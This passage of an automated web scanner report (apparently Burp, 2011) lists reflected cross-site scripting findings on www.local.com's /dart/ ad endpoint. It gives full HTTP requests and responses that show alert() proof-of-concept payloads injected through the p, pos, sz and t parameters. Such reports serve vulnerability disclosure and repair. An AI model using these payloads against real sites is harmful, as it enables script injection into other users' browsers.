Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:28 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748e5d33"style="x:expression(alert(1))"2ea0dbdbd7e?" target="_blank">
...[SNIP]...

2.8. http://www.local.com/dart/ [p parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 142ef'%3b04d7f2c0dea was submitted in the p parameter. This input was echoed as 142ef';04d7f2c0dea in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /dart/?ag=True&p=locm.pp142ef'%3b04d7f2c0dea&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp142ef';04d7f2c0dea;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.9. http://www.local.com/dart/ [p parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the p request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4a96"style%3d"x%3aexpression(alert(1))"957bd801f83 was submitted in the p parameter. This input was echoed as f4a96"style="x:expression(alert(1))"957bd801f83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.ppf4a96"style%3d"x%3aexpression(alert(1))"957bd801f83&sz=350x300&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:24 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.ppf4a96"style="x:expression(alert(1))"957bd801f83;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300;ord=1296748882748?" target="_blank">
...[SNIP]...

2.10. http://www.local.com/dart/ [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a068"style%3d"x%3aexpression(alert(1))"c701155616e was submitted in the pos parameter. This input was echoed as 6a068"style="x:expression(alert(1))"c701155616e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=86a068"style%3d"x%3aexpression(alert(1))"c701155616e&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=86a068"style="x:expression(alert(1))"c701155616e;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

2.11. http://www.local.com/dart/ [pos parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 795a7'%3b1996a89d919 was submitted in the pos parameter. This input was echoed as 795a7';1996a89d919 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /dart/?ag=True&p=locm.pp&pos=8795a7'%3b1996a89d919&t=8&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 894
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:33 GMT
Connection: close
Content-Length: 894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=8795a7';1996a89d919;tile=8;city=dallas_tx;sz=310x101;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.12. http://www.local.com/dart/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b was submitted in the sz parameter. This input was echoed as d243c"style="x:expression(alert(1))"d187ae2a24b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&sz=350x300d243c"style%3d"x%3aexpression(alert(1))"d187ae2a24b&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 975
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x300d243c"style="x:expression(alert(1))"d187ae2a24b;ord=1296748882748?" target="_blank">
...[SNIP]...

2.13. http://www.local.com/dart/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fc55'%3b14f61c68560 was submitted in the sz parameter. This input was echoed as 9fc55';14f61c68560 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /dart/?ag=True&p=locm.pp&sz=350x3009fc55'%3b14f61c68560&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 888
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:26 GMT
Connection: close
Content-Length: 888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<script language="JavaScript" src="http://ad.doubleclick.net/adj/locm.pp;dcopt=ist;kw=banks;pos=;tile=;city=dallas_tx;sz=350x3009fc55';14f61c68560;ord=1296748882748?" type="text/javascript">
...[SNIP]...

2.14. http://www.local.com/dart/ [t parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462 was submitted in the t parameter. This input was echoed as cf3d9"style="x:expression(alert(1))"9c6370ca462 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=8cf3d9"style%3d"x%3aexpression(alert(1))"9c6370ca462&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 981
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:02:35 GMT
Connection: close
Content-Length: 981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <style type="text/css">
       *
       {
           margin: 0px;
           padding: 0px;
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/locm.pp;dcopt=ist;kw=banks;pos=8;tile=8cf3d9"style="x:expression(alert(1))"9c6370ca462;city=dallas_tx;sz=310x101;ord=1296748882748?" target="_blank">
...[SNIP]...

2.15. http://www.local.com/dart/ [t parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.local.com
Path:	/dart/

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58aaf'%3bb65e854cbc0 was submitted in the t parameter. This input was echoed as 58aaf';b65e854cbc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /dart/?ag=True&p=locm.pp&pos=8&t=858aaf'%3bb65e854cbc0&sz=310x101&ord=1296748882748&k=banks&l=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
